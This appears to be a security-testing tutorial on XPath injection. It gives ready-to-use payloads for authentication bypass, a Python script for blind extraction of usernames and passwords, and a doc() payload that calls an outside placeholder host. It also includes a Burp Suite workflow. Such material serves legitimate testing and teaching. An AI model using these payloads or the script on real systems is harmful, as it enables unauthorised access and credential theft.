XPath Injection

XPath injection for XML database auth bypass and blind data extraction: detection, boolean-based character extraction, error-based confirmation, XPath 2.0 doc() OOB, and Burp testing workflow.

What is XPath Injection

XPath is a query language for XML documents. Web applications use XPath to authenticate users or to query XML data stores (config files, WSDL documents, native XML databases such as eXist-db and MarkLogic). When user input is concatenated into an XPath expression unsanitised, an attacker can rewrite the query, much like SQL injection but against XML data.
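To make the flaw concrete, here is a minimal sketch of the vulnerable pattern. The function name build_login_query and the //users/user schema are assumptions chosen for illustration; they are not taken from any particular application.

```python
def build_login_query(username: str, password: str) -> str:
    """Vulnerable pattern: user input is pasted straight into the XPath string."""
    return (
        "//users/user[name/text()='" + username + "' "
        "and password/text()='" + password + "']"
    )


# Benign input yields the query the developer intended.
print(build_login_query("alice", "s3cret"))

# A single quote in the input closes the string literal, so the rest of the
# input is parsed as XPath operators instead of data.
print(build_login_query("' or '1'='1' or 'x'='x", "anything"))
```

The second call prints a predicate that contains attacker-supplied or conditions, which is the root cause behind every payload on this page.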


Detection

Step 1 — Inject XPath special characters

In Burp Repeater, inject into login and search parameters:

'
"
' or '1'='1
' or 1=1 or 'a'='b
x' or 'x'='x

A changed response (error, unexpected success, or different XML) suggests that the input reaches a query unsanitised. Steps 2 and 3 confirm that the query is XPath rather than SQL.
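The same probing can be scripted. The sketch below is one possible approach, not a definitive tool: it takes a hypothetical send callable (an assumption, so the logic stays independent of any HTTP library) that submits one value and returns a (status code, body) pair, then reports probes whose response differs from a benign baseline.

```python
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]  # (HTTP status code, response body)

# The probe strings from Step 1.
PROBES: List[str] = ["'", '"', "' or '1'='1", "' or 1=1 or 'a'='b", "x' or 'x'='x"]


def find_anomalies(send: Callable[[str], Response],
                   baseline_value: str = "test") -> Dict[str, str]:
    """Return {probe: reason} for probes that change the response."""
    base_status, base_body = send(baseline_value)
    anomalies: Dict[str, str] = {}
    for probe in PROBES:
        status, body = send(probe)
        if status != base_status:
            anomalies[probe] = f"status {base_status} -> {status}"
        elif len(body) != len(base_body):
            anomalies[probe] = f"length {len(base_body)} -> {len(body)}"
    return anomalies
```

In practice send would wrap something like requests.post against the login form. Body length is a crude signal, so pages with dynamic content (timestamps, CSRF tokens) need a more tolerant comparison.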

Step 2 — Confirm with always-true condition

username=' or '1'='1
password=' or '1'='1

If login succeeds without a valid password → XPath auth bypass confirmed.

Step 3 — Distinguish from SQL injection

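Look for XPath-specific markers in error output. Function names such as position(), last(), or string-length(), or an exception type that names XPath (for example XPathException), confirm an XPath context. Names like string(), substring(), and count() are weaker evidence on their own, because similar names also appear in SQL.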


Authentication Bypass

Simple OR bypass

username=' or '1'='1' or 'x'='x
password=anything

XPath expression becomes:

//users/user[name/text()='' or '1'='1' or 'x'='x' and password/text()='anything']

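In XPath, and binds more tightly than or, so the predicate parses as name='' or '1'='1' or ('x'='x' and password='anything'). The middle term '1'='1' is always true, so the whole condition is true for every user node and the password check no longer matters.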
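The precedence argument can be checked without an XPath engine, because Python's and/or have the same relative precedence as XPath's. The sketch below mirrors the injected predicate as a Python boolean expression; the user records are made-up sample data.

```python
def predicate(name: str, password: str) -> bool:
    # Mirrors: name='' or '1'='1' or 'x'='x' and password='anything'
    return name == "" or "1" == "1" or "x" == "x" and password == "anything"


def predicate_explicit(name: str, password: str) -> bool:
    # Same expression with the implicit grouping written out.
    return name == "" or "1" == "1" or ("x" == "x" and password == "anything")


# Hypothetical user records (name, password), for illustration only.
users = [("admin", "S3cret!"), ("bob", "hunter2")]

matches = [name for name, pw in users if predicate(name, pw)]
print(matches)  # ['admin', 'bob']: every record satisfies the predicate
```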

Comment-style injection

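XPath 1.0 has no comment syntax, so the rest of the query cannot be commented out as in SQL. Instead, shape the payload so that the trailing condition stays syntactically valid but no longer decides the result:

username=admin' or '1'='1

The predicate becomes name/text()='admin' or '1'='1' and password/text()='...'. Because and binds more tightly than or, the admin node matches whatever password is supplied.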

Data Extraction — Blind Boolean-Based

When no data is reflected, extract values character by character using boolean conditions.

Check if the first character of the first username is ‘a’:

' or substring(//users/user[1]/name/text(),1,1)='a' or 'x'='y

In Burp Repeater:

username=' or substring(//users/user[1]/name/text(),1,1)='a' or '1'='2
  • true response → first char is ‘a’
  • false response → first char is not ‘a’, try next letter

Automated extraction script

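import requests
import string

target = 'http://TARGET/login'
# Candidate characters: printable ASCII minus the single quote (it would
# terminate the XPath string literal) and control whitespace.
charset = [c for c in string.printable if c != "'" and c not in '\t\n\r\x0b\x0c']
found = ''
pos = 1  # XPath string positions start at 1

while True:
    for c in charset:
        payload = f"' or substring(//users/user[1]/name/text(),{pos},1)='{c}' or '1'='2"
        r = requests.post(target, data={'username': payload, 'password': 'x'}, timeout=10)
        # 'Welcome' marks a true response here; adjust it to the target application
        if 'Welcome' in r.text:
            found += c
            print(f'Found: {found}')
            pos += 1
            break
    else:
        # No candidate matched: past the end of the value, or a character outside charset
        break

print(f'Username: {found}')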

Extract Password

' or substring(//users/user[position()=1]/password/text(),1,1)='a' or 'x'='y

Count Records

' or count(//users/user)>0 or 'x'='y
' or count(//users/user)=3 or 'x'='y
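The equality form of the count payload turns into a simple search loop. This is a sketch under the assumption that a hypothetical oracle callable sends a payload and returns True for a "true" response; the default path //users/user is the schema assumed throughout this page.

```python
from typing import Callable


def count_nodes(oracle: Callable[[str], bool],
                path: str = "//users/user",
                limit: int = 1000) -> int:
    """Find n such that count(path)=n, using one boolean question per guess."""
    for n in range(limit + 1):
        payload = f"' or count({path})={n} or 'x'='y"
        if oracle(payload):
            return n
    raise ValueError(f"count({path}) exceeds {limit} or the oracle is unreliable")
```

For large node sets, the > comparison from the first payload allows a binary search instead of a linear scan.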

Enumerate Node Names (if unknown schema)

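' or name(/*)='users' or 'x'='y
' or substring(name(/*),1,1)='u' or 'x'='y

name(/*) returns the name of the root element; extend the path (for example /*/*[1] for the root's first child element) to walk the tree. These forms pass a single node to name(), which XPath 2.0 engines require. In XPath 1.0, name(//*) also works, because name() uses the first node of the set in document order.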

XPath 2.0 — OOB via doc()

In XPath 2.0 (used by eXist-db, MarkLogic, Saxon):

' or doc('http://COLLABORATOR/evil')='' or 'x'='y

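If the processor is allowed to fetch remote documents, evaluating doc() triggers an HTTP request to the Collaborator URL, which gives out-of-band confirmation of XPath 2.0 injection even when the response itself shows no difference.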
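When several parameters are tested, it helps to know which one caused a callback. The sketch below builds the doc() payload with a unique token in the URL path; the token scheme and the function name doc_probe are assumptions for illustration, and COLLABORATOR remains a placeholder for your own callback host.

```python
import uuid
from typing import Tuple


def doc_probe(callback_host: str, label: str) -> Tuple[str, str]:
    """Return (token, payload); the token identifies the injection point."""
    token = f"{label}-{uuid.uuid4().hex[:8]}"
    payload = f"' or doc('http://{callback_host}/{token}')='' or 'x'='y"
    return token, payload


token, payload = doc_probe("COLLABORATOR", "login-username")
print(token)
print(payload)
```

A request for that token's path in the callback log then points back to the login username parameter.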


XPath in SOAP / XML APIs

In a SOAP request or XML body:

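<username>' or '1'='1' or 'x'='x</username>
<password>x</password>

The XPath query becomes: //user[name='' or '1'='1' or 'x'='x' and pass='x']

A bare ' or '1'='1 in the username alone is not enough here: and binds more tightly than or, so the predicate would still require pass='x'.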
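Payloads placed in an XML body must survive XML escaping. The sketch below uses Python's standard library to show that single quotes pass through unchanged, while a > in a payload is sent as an entity and decoded again by the receiving parser. The <login> wrapper element and the function name login_body are assumptions, not a real service's schema.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def login_body(username: str, password: str) -> str:
    """Build a minimal XML body; escape() handles &, < and > only."""
    return (
        "<login>"
        f"<username>{escape(username)}</username>"
        f"<password>{escape(password)}</password>"
        "</login>"
    )


payload = "' or count(//users/user)>0 or 'x'='y"
body = login_body(payload, "x")
print(body)  # the '>' travels as &gt;, the quotes are untouched

# The receiving XML parser decodes the entity, so the XPath layer
# sees the original payload again.
received = ET.fromstring(body).findtext("username")
print(received == payload)  # True
```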


Useful XPath Functions

Function                     Purpose
string-length(text())        Get length of a value
substring(text(),pos,len)    Extract characters
contains(text(),'x')         Check if value contains substring
count(//node)                Count nodes
name(node)                   Get node name
last()                       Index of last node
position()                   Current node position
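As an illustration of combining these functions, the sketch below first uses string-length() to learn how many characters to recover, then substring() to recover each one. It assumes a hypothetical oracle callable that sends a payload and returns True for a "true" response; it is one way to structure the search, not the only one.

```python
from typing import Callable, Optional


def extract_value(oracle: Callable[[str], bool], expr: str,
                  charset: str, max_len: int = 64) -> Optional[str]:
    """Recover the string value of expr through a true/false oracle."""
    # 1. string-length() fixes the number of characters to recover.
    length = next(
        (n for n in range(max_len + 1)
         if oracle(f"' or string-length({expr})={n} or 'x'='y")),
        None,
    )
    if length is None:
        return None  # longer than max_len, or the oracle is unreliable

    # 2. substring() tests one position at a time (positions start at 1).
    chars = []
    for pos in range(1, length + 1):
        hit = next(
            (c for c in charset
             if oracle(f"' or substring({expr},{pos},1)='{c}' or 'x'='y")),
            "?",  # placeholder when the character is outside charset
        )
        chars.append(hit)
    return "".join(chars)
```

Knowing the length up front avoids guessing where the value ends and makes characters outside the charset visible as ? instead of silently truncating the result. The charset must not contain a single quote, since that would break the payload's string literal.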

Burp Suite Workflow

  1. Proxy — intercept login and search requests; look for XML content or XML-style responses.
  2. Repeater — inject ', ", ' or '1'='1 into all input fields.
  3. Intruder — character brute-force for blind extraction (positions 1–20, chars a-z0-9).
  4. Scanner — active scan detects XPath injection via error-based and boolean response differences.
  5. Collaborator — OOB confirmation via XPath 2.0 doc() function.
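The Intruder step needs one payload per (position, character) pair. The sketch below generates that list for positions 1 to 20 and the characters a-z0-9, using the name path assumed earlier on this page; the function name intruder_payloads is illustrative. The output could be pasted into a simple payload list, or the two dimensions could instead be configured as separate payload positions.

```python
import itertools
import string
from typing import Iterator, Tuple

CHARSET = string.ascii_lowercase + string.digits  # a-z0-9


def intruder_payloads(expr: str = "//users/user[1]/name/text()",
                      max_pos: int = 20) -> Iterator[Tuple[int, str, str]]:
    """Yield (position, character, payload) for every combination."""
    for pos, ch in itertools.product(range(1, max_pos + 1), CHARSET):
        yield pos, ch, f"' or substring({expr},{pos},1)='{ch}' or '1'='2"


payloads = list(intruder_payloads())
print(len(payloads))   # 720 requests: 20 positions x 36 characters
print(payloads[0][2])
```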